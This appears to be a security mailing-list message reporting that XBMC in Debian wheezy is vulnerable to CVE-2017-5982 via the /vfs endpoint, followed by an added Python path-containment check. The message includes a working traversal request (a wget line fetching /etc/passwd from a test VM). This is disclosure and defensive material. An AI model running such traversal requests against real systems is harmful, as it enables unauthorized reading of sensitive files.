
XBMC CVE-2017-5982



Just confirmed (after a reasonable amount of time) that XBMC in wheezy
is vulnerable to CVE-2017-5982, although the exploit is different.

When XBMC is run as root (yes, probably a bad idea, this is a VM for
testing):

http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/auto-f4b8e6fd.tbn

retrieves:

/root/.xbmc/userdata/Thumbnails/Video/f/auto-f4b8e6fd.tbn

Or:

wget 'http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/../../../../../../etc/passwd'

Downloads - guess what?

/etc/passwd

This was marked as "unreproducible" for 2:12.3+dfsg1-3ubuntu1 in
dla-needed.txt, however I have a suspicion that is incorrect.

However, the information for CVE-2017-5982 is for /image, not /vfs.
-- 
Brian May <brian@linuxpenguins.xyz>
https://linuxpenguins.xyz/brian/
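
An added example, not part of the original message and not XBMC's own code: a lexical containment check for the /vfs/special:// requests shown above. The masterprofile mapping is taken from the message; the function, exception and constant names are hypothetical.

```python
import posixpath
from urllib.parse import unquote

# Assumption: mapping as observed in the message (XBMC running as root).
SPECIAL_ROOTS = {"masterprofile": "/root/.xbmc/userdata"}
VFS_PREFIX = "/vfs/"
SCHEME = "special://"


class Rejected(Exception):
    """Raised when a request does not stay inside its special:// root."""


def resolve_vfs(request_path):
    """Map /vfs/special://<root>/<rest> to a filesystem path, refusing
    anything that resolves outside the root's base directory."""
    if not request_path.startswith(VFS_PREFIX):
        raise Rejected("not a /vfs/ request")
    # Percent-decode before checking, so the check sees what the
    # filesystem layer would see.
    target = unquote(request_path[len(VFS_PREFIX):])
    if not target.startswith(SCHEME):
        raise Rejected("only special:// targets are served")
    name, _, rest = target[len(SCHEME):].partition("/")
    base = SPECIAL_ROOTS.get(name)
    if base is None:
        raise Rejected("unknown special:// root")
    # normpath collapses ".." segments; lstrip stops an absolute <rest>
    # from replacing the base in join(). This is lexical only: a live
    # server should also compare os.path.realpath() results to cover
    # symlinks inside the profile directory.
    candidate = posixpath.normpath(posixpath.join(base, rest.lstrip("/")))
    if posixpath.commonpath([base, candidate]) != base:
        raise Rejected("path escapes " + base)
    return candidate


if __name__ == "__main__":
    # The two request paths from the message above.
    for req in (
        "/vfs/special://masterprofile/Thumbnails/Video/f/auto-f4b8e6fd.tbn",
        "/vfs/special://masterprofile/Thumbnails/Video/f/../../../../../../etc/passwd",
    ):
        try:
            print("serve ", resolve_vfs(req))
        except Rejected as exc:
            print("reject", req, "->", exc)
```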

